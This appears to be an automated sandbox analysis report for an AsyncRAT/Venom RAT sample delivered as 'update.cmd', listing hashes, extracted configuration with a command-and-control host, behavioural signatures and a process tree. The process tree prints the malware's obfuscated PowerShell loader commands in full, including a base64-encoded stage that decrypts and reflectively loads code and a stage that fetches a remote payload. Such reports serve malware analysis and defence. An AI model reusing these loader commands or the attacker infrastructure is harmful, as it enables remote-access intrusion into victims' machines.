asyncrat | 43feb4c81e9e5be7b22c542dd0d54725075a67dbf592bb65b3b625c04256af55

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
07-03-2024 12:12

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

update.cmd
Size

60KB
MD5

55db0ea580cce204785f5537cbabf05b
SHA1

d2f423c3416532ef91b74b50c5cb746829f3d114
SHA256

43feb4c81e9e5be7b22c542dd0d54725075a67dbf592bb65b3b625c04256af55
SHA512

c12463cc06def3a872f904e44378145a39c72659961ed48156b083440041d4662a454c5737fd0fa45199e659ba62a90029c3800a94526895b43ac3ac0d430480
SSDEEP

1536:9TpJ48aohXl/LnI5BDLfj+OMfh3BRc8z4lJm5DQ3Vve:Jr4In7I5BDLfKf8+DYg

Score

10^/10

asyncrat venom clients rat

Malware Config

Extracted

Family

asyncrat

Version

5.0.5

Botnet

Venom Clients

mkys.duckdns.org:8890

Mutex

Venom_RAT_HVNC_Mutex_Venom RAT_HVNC

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3704-34-0x000002BCDD080000-0x000002BCDD096000-memory.dmp	family_asyncrat

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

21 3704 powershell.exe
38 3704 powershell.exe
83 3704 powershell.exe
130 3704 powershell.exe
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

15480 14756 WerFault.exe powershell.exe

flow	pid	process
21	3704	powershell.exe
38	3704	powershell.exe
83	3704	powershell.exe
130	3704	powershell.exe

pid	pid_target	process	target process
15480	14756	WerFault.exe	powershell.exe

Suspicious behavior: EnumeratesProcesses 20 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
3704	powershell.exe
3704	powershell.exe
4760	powershell.exe
4760	powershell.exe
1120	powershell.exe
1120	powershell.exe
1120	powershell.exe
4704	powershell.exe
4704	powershell.exe
4704	powershell.exe
12616	powershell.exe
12616	powershell.exe
12616	powershell.exe
3796	powershell.exe
3796	powershell.exe
3796	powershell.exe
14756	powershell.exe
14756	powershell.exe
14756	powershell.exe
14756	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeDebugPrivilege	1120	powershell.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	12616	powershell.exe
Token: SeDebugPrivilege	3796	powershell.exe
Token: SeDebugPrivilege	14756	powershell.exe

Suspicious use of WriteProcessMemory 40 IoCs

Processes:

cmd.execmd.exepowershell.execmd.execmd.exepowershell.execmd.exepowershell.execmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 4212 wrote to memory of 2292	4212	cmd.exe	cmd.exe
PID 4212 wrote to memory of 2292	4212	cmd.exe	cmd.exe
PID 4212 wrote to memory of 2308	4212	cmd.exe	cmd.exe
PID 4212 wrote to memory of 2308	4212	cmd.exe	cmd.exe
PID 2308 wrote to memory of 3496	2308	cmd.exe	cmd.exe
PID 2308 wrote to memory of 3496	2308	cmd.exe	cmd.exe
PID 2308 wrote to memory of 1744	2308	cmd.exe	cmd.exe
PID 2308 wrote to memory of 1744	2308	cmd.exe	cmd.exe
PID 2308 wrote to memory of 3704	2308	cmd.exe	powershell.exe
PID 2308 wrote to memory of 3704	2308	cmd.exe	powershell.exe
PID 3704 wrote to memory of 4760	3704	powershell.exe	powershell.exe
PID 3704 wrote to memory of 4760	3704	powershell.exe	powershell.exe
PID 1004 wrote to memory of 4316	1004	cmd.exe	cmd.exe
PID 1004 wrote to memory of 4316	1004	cmd.exe	cmd.exe
PID 1004 wrote to memory of 1128	1004	cmd.exe	cmd.exe
PID 1004 wrote to memory of 1128	1004	cmd.exe	cmd.exe
PID 1128 wrote to memory of 4324	1128	cmd.exe	cmd.exe
PID 1128 wrote to memory of 4324	1128	cmd.exe	cmd.exe
PID 1128 wrote to memory of 3296	1128	cmd.exe	cmd.exe
PID 1128 wrote to memory of 3296	1128	cmd.exe	cmd.exe
PID 1128 wrote to memory of 1120	1128	cmd.exe	powershell.exe
PID 1128 wrote to memory of 1120	1128	cmd.exe	powershell.exe
PID 1120 wrote to memory of 4704	1120	powershell.exe	powershell.exe
PID 1120 wrote to memory of 4704	1120	powershell.exe	powershell.exe
PID 3704 wrote to memory of 13128	3704	powershell.exe	cmd.exe
PID 3704 wrote to memory of 13128	3704	powershell.exe	cmd.exe
PID 13128 wrote to memory of 12616	13128	cmd.exe	powershell.exe
PID 13128 wrote to memory of 12616	13128	cmd.exe	powershell.exe
PID 12616 wrote to memory of 1524	12616	powershell.exe	cmd.exe
PID 12616 wrote to memory of 1524	12616	powershell.exe	cmd.exe
PID 1524 wrote to memory of 3796	1524	cmd.exe	powershell.exe
PID 1524 wrote to memory of 3796	1524	cmd.exe	powershell.exe
PID 3796 wrote to memory of 13384	3796	powershell.exe	cmd.exe
PID 3796 wrote to memory of 13384	3796	powershell.exe	cmd.exe
PID 3796 wrote to memory of 14756	3796	powershell.exe	powershell.exe
PID 3796 wrote to memory of 14756	3796	powershell.exe	powershell.exe
PID 3796 wrote to memory of 14756	3796	powershell.exe	powershell.exe
PID 14756 wrote to memory of 15096	14756	powershell.exe	cmd.exe
PID 14756 wrote to memory of 15096	14756	powershell.exe	cmd.exe
PID 14756 wrote to memory of 15096	14756	powershell.exe	cmd.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\update.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:4212

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
2⤵
PID:2292

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\update.cmd
2⤵
- Suspicious use of WriteProcessMemory
PID:2308

C:\Windows\system32\cmd.exe
cmd /c "set __=^&rem"
3⤵
PID:3496

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\update.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93ZXJzaGVsbCAtdyBoaWRkZW47ZnVuY3Rpb24gTmpxc2koJGFGRGxFKXskRlVRT209W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQWVzXTo6Q3JlYXRlKCk7JEZVUU9tLk1vZGU9W1N5c3RlbS5TZWN1cml0eS5DcnlwdG9ncmFwaHkuQ2lwaGVyTW9kZV06OkNCQzskRlVRT20uUGFkZGluZz1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5QYWRkaW5nTW9kZV06OlBLQ1M3OyRGVVFPbS5LZXk9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnQUhUZE9FL3hjdmdJSHFUajZEOGhsZStsMTdONklWWTVzOVlhSjE4WmpPWT0nKTskRlVRT20uSVY9W1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnZ0Q5RS9pL2x6Wk1NMXgrQWtTUVdTQT09Jyk7JGZUdURqPSRGVVFPbS5DcmVhdGVEZWNyeXB0b3IoKTskY2NVVko9JGZUdURqLlRyYW5zZm9ybUZpbmFsQmxvY2soJGFGRGxFLDAsJGFGRGxFLkxlbmd0aCk7JGZUdURqLkRpc3Bvc2UoKTskRlVRT20uRGlzcG9zZSgpOyRjY1VWSjt9ZnVuY3Rpb24ga1FoZWsoJGFGRGxFKXska2ZtWmc9TmV3LU9iamVjdCBTeXN0ZW0uSU8uTWVtb3J5U3RyZWFtKCwkYUZEbEUpOyRpV212WD1OZXctT2JqZWN0IFN5c3RlbS5JTy5NZW1vcnlTdHJlYW07JHdSd2RrPU5ldy1PYmplY3QgU3lzdGVtLklPLkNvbXByZXNzaW9uLkdaaXBTdHJlYW0oJGtmbVpnLFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTskd1J3ZGsuQ29weVRvKCRpV212WCk7JHdSd2RrLkRpc3Bvc2UoKTska2ZtWmcuRGlzcG9zZSgpOyRpV212WC5EaXNwb3NlKCk7JGlXbXZYLlRvQXJyYXkoKTt9JG1KZ3ViPVtTeXN0ZW0uSU8uRmlsZV06OlJlYWRMaW5lcyhbQ29uc29sZV06OlRpdGxlKTskdFBTeEY9a1FoZWsgKE5qcXNpIChbQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoW1N5c3RlbS5MaW5xLkVudW1lcmFibGVdOjpFbGVtZW50QXQoJG1KZ3ViLCA1KS5TdWJzdHJpbmcoMikpKSk7JHlTZ2taPWtRaGVrIChOanFzaSAoW0NvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKFtTeXN0ZW0uTGlucS5FbnVtZXJhYmxlXTo6RWxlbWVudEF0KCRtSmd1YiwgNikuU3Vic3RyaW5nKDIpKSkpO1tTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0keVNna1opLkVudHJ5UG9pbnQuSW52b2tlKCRudWxsLCRudWxsKTtbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJHRQU3hGKS5FbnRyeVBvaW50Lkludm9rZSgkbnVsbCwkbnVsbCk7'))) "
3⤵
PID:1744

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\AaregHVNC-bat.bat"' & exit
4⤵
- Suspicious use of WriteProcessMemory
PID:13128

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\AaregHVNC-bat.bat"'
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:12616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AaregHVNC-bat.bat" "
6⤵
- Suspicious use of WriteProcessMemory
PID:1524

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "<#Abfarads Forcene Skrmformaternes #>;$Sexismes=(cmd /c set /A 115^^0);Function Stamoplysninger ([String]$Multicomponentnsubordinations){$Sexismes=[char][int]$Sexismes;$Wyclifism=$Sexismes+'ubstring';$Equinovarus=8;$Amtsfredningskontor=Fyldestgrelsens1554($Multicomponentnsubordinations);For($Multicomponent=7; $Multicomponent -lt $Amtsfredningskontor; $Multicomponent+=$Equinovarus){$Filernes=$Multicomponentnsubordinations.$Wyclifism.Invoke($Multicomponent, 1);$Fyldestgrelsens155=$Fyldestgrelsens155+$Filernes;}$Fyldestgrelsens155;}function Venae200 ($Thalli){. ($Fyldestgrelsens15501) ($Thalli);}function Fyldestgrelsens1554 ([String]$Dechifrerbart){$Enchainements1=$Dechifrerbart.Length-1;$Enchainements1;}$Fyldestgrelsens15502=Stamoplysninger 'AlbuminTMiranhar Fre.kfaYeahc lnBrintjos,xheartfSkspor.eMo.esterGeoprumrArmadosiU.tryksnMeteorog,uroche ';$Stomatodynia107=Stamoplysninger 'hammeinh SammentBortvant GglernpErstatnsUbestan:Udflyt./oxan an/ Stirrew BereniwProtektwHundyra.AbneurasSa phice Chakotn,relibedSko.tsosSaloondpSnogahiaUnmeekncBonbonneNon,ere.Concertcseis.otoNonnomamEgotrip/DeroppepNskeforrPotterno.entjen/NonrepadUn,onfilVirker./Turnusow Nonprev D ndillRestaurjGenskri1 ioletfnCund,mi ';$Fyldestgrelsens15501=Stamoplysninger 'Tra,ezsi Veri,ieSprin,sxNedfrys ';$Fyldestgrelsens15500=Stamoplysninger 'S ratig$ KonstagPrinterlSpigredoLook,utb UnkennaLegio.rlMelinis:SlangebENan owanudven.icExchanghBereafeaProct.siTarifern Restine Mittebm .eskrieBispestn ldretbtKilooersAsyndet8 roses Pioneri=Isocep. In.onciSModregntAkvariea KirkefrFrekvent Cigare-TidvisgBUnloanai Dro,ont Glathsstek.tstTTr,hemir Mink na OverganDechif sTransl,fFa.rerseDr.itsnrSignif. beckerh-TraadspSSo netioDe deniu ,naldfr InvitacRimupoleConvolv C lctu$Deko prSHom chrtUsquebaoNontreambrndemraAla,umptAst rolo ,ekanad Bispesy Sa,arinLubricaiWheelsma Svejfe1Kotyper0Ca.aldo7Counter N.nethi-SkadesbDKabyssee TinguysVernacuttermostiOverlubnBistandaKom unitKrongodiPlasticoWhichwanDalenes Til.age$ N,nengEananismnUnjud cc askish .yramiaFo.keuniGenne.sn IneffueThin,ammKnytnveeTogplannYrirredtchrysopsPetiol.2.ukning ';Venae200 (Stamoplysninger 'Fl ksti$Peroralg,ilosofl Livs.ooSchimmebForurenaNaturh,l Vo iti: ShovelEpregnann mpiricAnnbet.h Ten,isaSonantii eignionLaborageTr nsplmabridgee Plot.inTibiocatBogeymesDemonst2 udlude=Nringsv$,verense KrikkenPorterev S inne:FluxerdaForegripOutpeoppTe,nolodskdendea K,lorit ChoreoaSammenb ') ;Venae200 (Stamoplysninger 'EarstonI HeraudmSanktelpReiteraoBindslerbjerneht Uov,rv-leptoneMharvenkoRectivedRe.ersiuGentagelB nkvseeSmkkers .nnebrtBStmagttiChry.amtBndelt.s,lexorsTpopletrr edriftaSynkretn Ar,hdesGrundstfsp,rpleeca.pfirr ermafr ') ;$Enchainements2=$Enchainements2+'\Sondqkr.Arc' ;Venae200 (Stamoplysninger ' Tennis$HreappagPoorwillKosme ioRenegotbbyggeria.ernekilOveremp:Bad,haaEemeriesnContobec,igarilhXylograaM,nockuiVelinfonMal.etveSeksualmFulde,aeGrnttrrn .hysantSuspenssJeremia7unhomel=Pedi,lg( ForsgsTDanaisfeIn.ibulsDiveraftCapelex- O sorgPIns.lpha Afkortt RomberhTyranni indehu$HarmoniEIgang,anAntita,cSlovensh ,narkia BuncomiInd vidnTids.kreUnexampmTrophobeS akiesnSamlevetTa,etalsMon tre2Circuma) Flagel ') ;while (-not $Enchainements7) {Venae200 (Stamoplysninger ' TerfezIK,nstnefTurneer Agg uto(Superel$OpbrugeEOpfindenOozilyac Justith A metraBestteniY.zlukpn CentrueAfsnuppm KonvereSimonsen stoplytArveanlsSeoulko8Behovst. uncastJByret doGes urabGuldbarSStersfatSubjectaTouperetRefusabefriluft Unmakab-KedeleneS eevinqSom,lie Linjefa$ParasitFOutbeamyAvlskosl Brain.dSejpineeExportasReexhi.t ssalgegNoncertr jambore LieigelCabin.tsLa.ursteSl.bbernBortfres Photoc1Vandrer5S kiome5Invol,t0Lysbeha2Symptom)Antinga Succini{LommetrSfiskerftsl.ttenagroenlarIndustrtGradien-M.stnkeSSemihaslPlaywomeFlottenePeddi.rpStileve Firspan1G,nebra}LigningeDiscipllFedereosIndarbeeTilbage{R treatSEnterortPreremoaFrareg.rTrningstEnetale-GruppesSShuttlel HestereOversewe Junglep Guldhe Mobocra1Tranned;cincho,V Cr bbleTrochlenFantasiaBvschateAntient2Afkrvni0Sc ssor0 Paxamb Kilop $.riticiFSammenvyNucleomlMah.eerdNonblooeTaksisrsMonophyt JamredgVanvittrBasic,ueDim.ednl jorteusNoncilie,enignlnmelanizsRackett1ambidex5slashed5Corsag 0Udskriv0Br reme}Madglde ');Venae200 (Stamoplysninger 'syndika$Hidsersgb.andstlUros stoImageleb tilpasaCitizenlFlydevg:Comp,teEAalekvanVaginipcF.idageh Bugta aOutkeepiErgostenStreetaeHeliochmOkkupaneMacmilln CykelktKrngforsKollok,7Disharm=arolium(EroternTSu metoeNya.satsDivergetSandsto-IslamicPGl,fricaBald.ertOversowhFa sseb Hojulg$Main,ysEst.adabnroverencAdressehCondylea S.ivgai H.tidenReconveeTvegetpmTransiseZimmeannChauv ntTep,mpos Anpris2Domstol)Dybbje ') ;}Venae200 (Stamoplysninger 'Lnregul$TelefongColon,tlEspous.oPanthavbHeterocaMeterm lHype di: AnastaL Te efoeStathmod.eblikbeHeldenttDiastoloMenacernAbitundekrelosdnExplicasIntermi D,agoav= Urtaag Hypot eGTidstaveMusikletCamizes-Hygr.neCF,airzioN.npartnClausulti.trophe ratihanGrn.evatEvolves ari.ona$lampmakEMaintain.odgadecWoundinh Datauhahove,maiDemarkenNonf,rbeBispevimHarmonieFimb,ilnKontrahtSwage,fs Optio.2Freeman ');Venae200 (Stamoplysninger ' r,vgal$BilledfgRet,ophlspli.saoKlowetwbIndgrebaMounp tl Liged.:Brneho EDampdreuPrehen.rCantabroTilk,ldkMainlinuPillernrProfetis Bemi geFarbar.nDelegat Forvars=Wa.hbow Vulgari[Smin,ebSBoligeny K strasReintertooge ete Sm tenmA,etall. yrtidCTovaveioOperatinNeurotivskalknieSpi iturbroc ertSimulat]Panegy :Strateg:K,ivaleFThrustorOdzookeotavernwmAuteuriBSmilemea Bankaks Sky geePe ioph6Bundpla4 Hoved SGyvesaft Curpler Baar.niDevelopnJordnddgForuren(Begaved$SpurveuLSpeakereSvingtadBulneraeEpileptt AntifooFrituren PlacemeHumidlynHaandkbs ugelnn)Enkeltf ');Venae200 (Stamoplysninger 'Vul anb$ MisdangUngainllBordetso nonreabEndothea Dipl ml Psykol:UngauntFKnstniny digitalunshowidOverenseKok vrksNonvivitMedia igForka rrIndlsteeLuskerilC mpetisWal,pape NarrownV.netnks uperla1Ironwor5Brdfdtl5Srmrked2Uncompu Ti,strb=Somn,le Manbote[StudiekSCampingyReorgans UnprodtForuro,eDcla ssmEndosom.NematogTgoloshpeKjerstixFemlin.tFra,pol. Vi harEMarconin Mrkvr cSla ifyochikanedEndoraliSpred.in RundvigSkad,sl]Andengr:Zambier:ProtozoAStationSSundereCoverjegIRatg,arIProcesr.lissenpG OleateeDatidigtMerl.ccSBekldnitAlt.rnaranskudtibenvar n SengefgLapisen(speedin$StitcheEAntiguauAutark,rUnfloweoUnmate,k Dimensu.ermagar,etfrdssSkildereJimmslonRepress)skruegn ');Venae200 (Stamoplysninger 'Er vers$UanvendgBadeanslMil,foroKrmmerhbCutlipsaFremstilSenatsb:SkatterFUdmarchyPresninl PetaurdDematereven epusU,snittt TilmelgH,vnebarStagetleEcphraclCrematosFabr.kaeHomogonnNivea ksSpeedwa1Snivelh5Thunder5Quadrap3directi= Musisk$,ataracFSadistey cano.il FestmidFortolkeKursusosUdlednitSinlikegShikarrr HalvslePar,henlUnguilts fjerkredisorganVarligesPopu,ar1Eksempe5Brandgu5Ch,fing2Skimm,n. Physios SupercuPegbox.bPeshkarsIridesst I iasmr.ecerptiHoliermnslickergLustr,m(Dedigna3under.x2Ber.har5Podargu1Sclero,4Spir.pe7Tim.ant, Jumpsc3Alistai3Mate,ia0backfir9A.gusjn8Shempre) Electr ');Venae200 $Fyldestgrelsens1553;"
7⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3796

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
8⤵
PID:13384

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Abfarads Forcene Skrmformaternes #>;$Sexismes=(cmd /c set /A 115^^0);Function Stamoplysninger ([String]$Multicomponentnsubordinations){$Sexismes=[char][int]$Sexismes;$Wyclifism=$Sexismes+'ubstring';$Equinovarus=8;$Amtsfredningskontor=Fyldestgrelsens1554($Multicomponentnsubordinations);For($Multicomponent=7; $Multicomponent -lt $Amtsfredningskontor; $Multicomponent+=$Equinovarus){$Filernes=$Multicomponentnsubordinations.$Wyclifism.Invoke($Multicomponent, 1);$Fyldestgrelsens155=$Fyldestgrelsens155+$Filernes;}$Fyldestgrelsens155;}function Venae200 ($Thalli){. ($Fyldestgrelsens15501) ($Thalli);}function Fyldestgrelsens1554 ([String]$Dechifrerbart){$Enchainements1=$Dechifrerbart.Length-1;$Enchainements1;}$Fyldestgrelsens15502=Stamoplysninger 'AlbuminTMiranhar Fre.kfaYeahc lnBrintjos,xheartfSkspor.eMo.esterGeoprumrArmadosiU.tryksnMeteorog,uroche ';$Stomatodynia107=Stamoplysninger 'hammeinh SammentBortvant GglernpErstatnsUbestan:Udflyt./oxan an/ Stirrew BereniwProtektwHundyra.AbneurasSa phice Chakotn,relibedSko.tsosSaloondpSnogahiaUnmeekncBonbonneNon,ere.Concertcseis.otoNonnomamEgotrip/DeroppepNskeforrPotterno.entjen/NonrepadUn,onfilVirker./Turnusow Nonprev D ndillRestaurjGenskri1 ioletfnCund,mi ';$Fyldestgrelsens15501=Stamoplysninger 'Tra,ezsi Veri,ieSprin,sxNedfrys ';$Fyldestgrelsens15500=Stamoplysninger 'S ratig$ KonstagPrinterlSpigredoLook,utb UnkennaLegio.rlMelinis:SlangebENan owanudven.icExchanghBereafeaProct.siTarifern Restine Mittebm .eskrieBispestn ldretbtKilooersAsyndet8 roses Pioneri=Isocep. In.onciSModregntAkvariea KirkefrFrekvent Cigare-TidvisgBUnloanai Dro,ont Glathsstek.tstTTr,hemir Mink na OverganDechif sTransl,fFa.rerseDr.itsnrSignif. beckerh-TraadspSSo netioDe deniu ,naldfr InvitacRimupoleConvolv C lctu$Deko prSHom chrtUsquebaoNontreambrndemraAla,umptAst rolo ,ekanad Bispesy Sa,arinLubricaiWheelsma Svejfe1Kotyper0Ca.aldo7Counter N.nethi-SkadesbDKabyssee TinguysVernacuttermostiOverlubnBistandaKom unitKrongodiPlasticoWhichwanDalenes Til.age$ N,nengEananismnUnjud cc askish .yramiaFo.keuniGenne.sn IneffueThin,ammKnytnveeTogplannYrirredtchrysopsPetiol.2.ukning ';Venae200 (Stamoplysninger 'Fl ksti$Peroralg,ilosofl Livs.ooSchimmebForurenaNaturh,l Vo iti: ShovelEpregnann mpiricAnnbet.h Ten,isaSonantii eignionLaborageTr nsplmabridgee Plot.inTibiocatBogeymesDemonst2 udlude=Nringsv$,verense KrikkenPorterev S inne:FluxerdaForegripOutpeoppTe,nolodskdendea K,lorit ChoreoaSammenb ') ;Venae200 (Stamoplysninger 'EarstonI HeraudmSanktelpReiteraoBindslerbjerneht Uov,rv-leptoneMharvenkoRectivedRe.ersiuGentagelB nkvseeSmkkers .nnebrtBStmagttiChry.amtBndelt.s,lexorsTpopletrr edriftaSynkretn Ar,hdesGrundstfsp,rpleeca.pfirr ermafr ') ;$Enchainements2=$Enchainements2+'\Sondqkr.Arc' ;Venae200 (Stamoplysninger ' Tennis$HreappagPoorwillKosme ioRenegotbbyggeria.ernekilOveremp:Bad,haaEemeriesnContobec,igarilhXylograaM,nockuiVelinfonMal.etveSeksualmFulde,aeGrnttrrn .hysantSuspenssJeremia7unhomel=Pedi,lg( ForsgsTDanaisfeIn.ibulsDiveraftCapelex- O sorgPIns.lpha Afkortt RomberhTyranni indehu$HarmoniEIgang,anAntita,cSlovensh ,narkia BuncomiInd vidnTids.kreUnexampmTrophobeS akiesnSamlevetTa,etalsMon tre2Circuma) Flagel ') ;while (-not $Enchainements7) {Venae200 (Stamoplysninger ' TerfezIK,nstnefTurneer Agg uto(Superel$OpbrugeEOpfindenOozilyac Justith A metraBestteniY.zlukpn CentrueAfsnuppm KonvereSimonsen stoplytArveanlsSeoulko8Behovst. uncastJByret doGes urabGuldbarSStersfatSubjectaTouperetRefusabefriluft Unmakab-KedeleneS eevinqSom,lie Linjefa$ParasitFOutbeamyAvlskosl Brain.dSejpineeExportasReexhi.t ssalgegNoncertr jambore LieigelCabin.tsLa.ursteSl.bbernBortfres Photoc1Vandrer5S kiome5Invol,t0Lysbeha2Symptom)Antinga Succini{LommetrSfiskerftsl.ttenagroenlarIndustrtGradien-M.stnkeSSemihaslPlaywomeFlottenePeddi.rpStileve Firspan1G,nebra}LigningeDiscipllFedereosIndarbeeTilbage{R treatSEnterortPreremoaFrareg.rTrningstEnetale-GruppesSShuttlel HestereOversewe Junglep Guldhe Mobocra1Tranned;cincho,V Cr bbleTrochlenFantasiaBvschateAntient2Afkrvni0Sc ssor0 Paxamb Kilop $.riticiFSammenvyNucleomlMah.eerdNonblooeTaksisrsMonophyt JamredgVanvittrBasic,ueDim.ednl jorteusNoncilie,enignlnmelanizsRackett1ambidex5slashed5Corsag 0Udskriv0Br reme}Madglde ');Venae200 (Stamoplysninger 'syndika$Hidsersgb.andstlUros stoImageleb tilpasaCitizenlFlydevg:Comp,teEAalekvanVaginipcF.idageh Bugta aOutkeepiErgostenStreetaeHeliochmOkkupaneMacmilln CykelktKrngforsKollok,7Disharm=arolium(EroternTSu metoeNya.satsDivergetSandsto-IslamicPGl,fricaBald.ertOversowhFa sseb Hojulg$Main,ysEst.adabnroverencAdressehCondylea S.ivgai H.tidenReconveeTvegetpmTransiseZimmeannChauv ntTep,mpos Anpris2Domstol)Dybbje ') ;}Venae200 (Stamoplysninger 'Lnregul$TelefongColon,tlEspous.oPanthavbHeterocaMeterm lHype di: AnastaL Te efoeStathmod.eblikbeHeldenttDiastoloMenacernAbitundekrelosdnExplicasIntermi D,agoav= Urtaag Hypot eGTidstaveMusikletCamizes-Hygr.neCF,airzioN.npartnClausulti.trophe ratihanGrn.evatEvolves ari.ona$lampmakEMaintain.odgadecWoundinh Datauhahove,maiDemarkenNonf,rbeBispevimHarmonieFimb,ilnKontrahtSwage,fs Optio.2Freeman ');Venae200 (Stamoplysninger ' r,vgal$BilledfgRet,ophlspli.saoKlowetwbIndgrebaMounp tl Liged.:Brneho EDampdreuPrehen.rCantabroTilk,ldkMainlinuPillernrProfetis Bemi geFarbar.nDelegat Forvars=Wa.hbow Vulgari[Smin,ebSBoligeny K strasReintertooge ete Sm tenmA,etall. yrtidCTovaveioOperatinNeurotivskalknieSpi iturbroc ertSimulat]Panegy :Strateg:K,ivaleFThrustorOdzookeotavernwmAuteuriBSmilemea Bankaks Sky geePe ioph6Bundpla4 Hoved SGyvesaft Curpler Baar.niDevelopnJordnddgForuren(Begaved$SpurveuLSpeakereSvingtadBulneraeEpileptt AntifooFrituren PlacemeHumidlynHaandkbs ugelnn)Enkeltf ');Venae200 (Stamoplysninger 'Vul anb$ MisdangUngainllBordetso nonreabEndothea Dipl ml Psykol:UngauntFKnstniny digitalunshowidOverenseKok vrksNonvivitMedia igForka rrIndlsteeLuskerilC mpetisWal,pape NarrownV.netnks uperla1Ironwor5Brdfdtl5Srmrked2Uncompu Ti,strb=Somn,le Manbote[StudiekSCampingyReorgans UnprodtForuro,eDcla ssmEndosom.NematogTgoloshpeKjerstixFemlin.tFra,pol. Vi harEMarconin Mrkvr cSla ifyochikanedEndoraliSpred.in RundvigSkad,sl]Andengr:Zambier:ProtozoAStationSSundereCoverjegIRatg,arIProcesr.lissenpG OleateeDatidigtMerl.ccSBekldnitAlt.rnaranskudtibenvar n SengefgLapisen(speedin$StitcheEAntiguauAutark,rUnfloweoUnmate,k Dimensu.ermagar,etfrdssSkildereJimmslonRepress)skruegn ');Venae200 (Stamoplysninger 'Er vers$UanvendgBadeanslMil,foroKrmmerhbCutlipsaFremstilSenatsb:SkatterFUdmarchyPresninl PetaurdDematereven epusU,snittt TilmelgH,vnebarStagetleEcphraclCrematosFabr.kaeHomogonnNivea ksSpeedwa1Snivelh5Thunder5Quadrap3directi= Musisk$,ataracFSadistey cano.il FestmidFortolkeKursusosUdlednitSinlikegShikarrr HalvslePar,henlUnguilts fjerkredisorganVarligesPopu,ar1Eksempe5Brandgu5Ch,fing2Skimm,n. Physios SupercuPegbox.bPeshkarsIridesst I iasmr.ecerptiHoliermnslickergLustr,m(Dedigna3under.x2Ber.har5Podargu1Sclero,4Spir.pe7Tim.ant, Jumpsc3Alistai3Mate,ia0backfir9A.gusjn8Shempre) Electr ');Venae200 $Fyldestgrelsens1553;"
8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:14756

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c set /A 115^^0
9⤵
PID:15096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 14756 -s 2476
9⤵
- Program crash
PID:15480

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\update.cmd" "
1⤵
- Suspicious use of WriteProcessMemory
PID:1004

